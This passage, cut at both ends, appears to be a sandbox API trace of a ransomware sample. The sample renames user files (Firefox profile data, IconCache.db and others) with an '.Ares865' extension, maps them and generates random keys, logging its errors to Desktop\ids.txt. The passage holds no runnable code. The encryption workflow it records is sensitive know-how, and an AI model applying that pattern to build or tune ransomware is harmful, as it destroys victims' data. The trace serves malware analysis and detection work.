Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 265 [0045.888] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.888] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x138e [0045.888] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x109, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x109, lpOverlapped=0x0) returned 1 [0045.888] CloseHandle (hObject=0x164) returned 1 [0045.889] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.889] CloseHandle (hObject=0x0) returned 0 [0045.889] CloseHandle (hObject=0x0) returned 0 [0045.889] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0045.889] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0045.889] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d25a8 [0045.937] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\* FindFirstFile error 3\r\n") returned 292 [0045.937] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Windows Defender\\Definition Updates\\Backup\\* FindFirstFile error 3\r\n") returned 292 [0045.937] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0045.937] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1497 [0045.937] WriteFile (in: hFile=0x120, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0045.938] CloseHandle (hObject=0x120) returned 1 [0045.938] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2648 [0045.941] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865") returned 253 [0045.941] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\statedata\\racdatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.941] GetLastError () returned 0x20 [0045.941] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 275 [0045.941] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\StateData\\RacDatabase.sdf MoveFileEx error 32\r\n") returned 275 [0045.941] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.941] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15bb [0045.941] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x113, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x113, lpOverlapped=0x0) returned 1 [0045.941] CloseHandle (hObject=0x164) returned 1 [0045.942] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.942] CloseHandle (hObject=0x0) returned 0 [0045.942] CloseHandle (hObject=0x0) returned 0 [0045.942] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4e1e72ec, ftCreationTime.dwHighDateTime=0x1cb8927, ftLastAccessTime.dwLowDateTime=0x4e1e72ec, ftLastAccessTime.dwHighDateTime=0x1cb8927, ftLastWriteTime.dwLowDateTime=0xbddddec0, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0045.943] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865") returned 260 [0045.943] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf.Ares865" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\application data\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf.ares865"), dwFlags=0x1) returned 0 [0045.943] GetLastError () returned 0x20 [0045.943] wsprintfA (in: param_1=0x2e2dc38, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 282 [0045.943] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf MoveFileEx error 32\r\n") returned 282 [0045.943] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0045.943] SetFilePointer (in: hFile=0x164, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x16ce [0045.943] WriteFile (in: hFile=0x164, lpBuffer=0x2e2dc38*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x2e2d5d4, lpOverlapped=0x0 | out: lpBuffer=0x2e2dc38*, lpNumberOfBytesWritten=0x2e2d5d4*=0x11a, lpOverlapped=0x0) returned 1 [0045.943] CloseHandle (hObject=0x164) returned 1 [0045.945] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0045.945] CloseHandle (hObject=0x0) returned 0 [0045.945] CloseHandle (hObject=0x0) returned 0 [0045.945] FindNextFileW (in: hFindFile=0x2cd028, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xece09220, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x36e8f0a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x36eb5200, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x25000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 0 [0045.945] FindClose (in: hFindFile=0x2cd028 | out: hFindFile=0x2cd028) returned 1 [0045.946] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d25c8 [0045.970] wsprintfA (in: param_1=0x2e2f028, param_2="[ERROR] %S FindFirstFile error %i\r\n" | out: param_1="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\* FindFirstFile error 3\r\n") returned 292 [0045.970] lstrlenA (lpString="[ERROR] C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\* FindFirstFile error 3\r\n") returned 292 [0045.970] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0045.970] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x17e8 [0045.970] WriteFile (in: hFile=0x120, lpBuffer=0x2e2f028*, nNumberOfBytesToWrite=0x124, lpNumberOfBytesWritten=0x2e2e514, lpOverlapped=0x0 | out: lpBuffer=0x2e2f028*, lpNumberOfBytesWritten=0x2e2e514*=0x124, lpOverlapped=0x0) returned 1 [0045.970] CloseHandle (hObject=0x120) returned 1 [0045.971] RtlInterlockedPopEntrySList (in: ListHead=0x2e77d0 | out: ListHead=0x2e77d0) returned 0x2d2348 [0046.365] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\IconCache.db.Ares865") returned 65 [0046.365] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\IconCache.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\iconcache.db"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\IconCache.db.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\iconcache.db.ares865"), dwFlags=0x1) returned 1 [0046.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\IconCache.db.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\iconcache.db.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0046.365] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1206133) returned 1 [0046.366] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0046.366] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbaa0 [0046.366] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0046.366] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0046.367] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0046.367] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0046.367] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x126a80, lpName=0x0) returned 0x12c [0046.367] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x126a80) returned 0x3450000 [0046.441] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0046.442] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0046.442] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0046.442] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb18 [0046.768] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.Ares865") returned 103 [0046.768] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml.ares865"), dwFlags=0x1) returned 1 [0046.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\active-update.xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\updates\\e7cf176e110c211b\\active-update.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0046.770] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1124) returned 1 [0046.770] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0046.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbaa0 [0046.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0046.771] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0046.772] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0046.772] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0046.772] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x118 [0046.774] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x190000 [0046.777] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0046.778] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0046.778] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0046.778] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb90 [0046.779] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.Ares865") returned 97 [0046.779] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\updates\\e7cf176e110c211b\\updates.xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\updates\\e7cf176e110c211b\\updates.xml.ares865"), dwFlags=0x1) returned 1 [0046.779] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates.xml.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\updates\\e7cf176e110c211b\\updates.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0046.779] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=57) returned 1 [0046.780] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0046.780] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbaa0 [0046.780] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0046.780] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0046.781] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0046.781] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0046.781] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x340, lpName=0x0) returned 0x118 [0046.784] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x340) returned 0x190000 [0046.784] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0046.785] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0046.785] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0046.785] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cb310 [0046.792] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar.Ares865") returned 106 [0046.793] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar.ares865"), dwFlags=0x1) returned 1 [0046.795] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\updates\\E7CF176E110C211B\\updates\\0\\update.mar.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\updates\\e7cf176e110c211b\\updates\\0\\update.mar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x120 [0046.795] GetFileSizeEx (in: hFile=0x120, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=600000) returned 1 [0046.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0046.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbaa0 [0046.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f02f8 [0046.796] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0046.796] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0046.796] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0046.796] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x92ac0, lpName=0x0) returned 0x118 [0046.798] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x92ac0) returned 0x1120000 [0046.822] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0046.822] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0046.822] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0046.822] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb90 [0046.865] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite.Ares865") returned 120 [0046.865] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite.ares865"), dwFlags=0x1) returned 1 [0046.866] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\OfflineCache\\index.sqlite.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\offlinecache\\index.sqlite.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x168 [0046.866] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=262144) returned 1 [0046.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3240020 [0046.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbaa0 [0046.866] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0046.867] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f02f8) returned 1 [0046.867] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0046.867] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0046.867] CreateFileMappingW (hFile=0x168, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x40300, lpName=0x0) returned 0x118 [0046.869] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x40300) returned 0x420000 [0046.880] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f02f8) returned 1 [0046.881] CryptGenRandom (in: hProv=0x2f02f8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0046.881] CryptReleaseContext (hProv=0x2f02f8, dwFlags=0x0) returned 1 [0046.881] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbb90 [0046.906] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0046.907] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 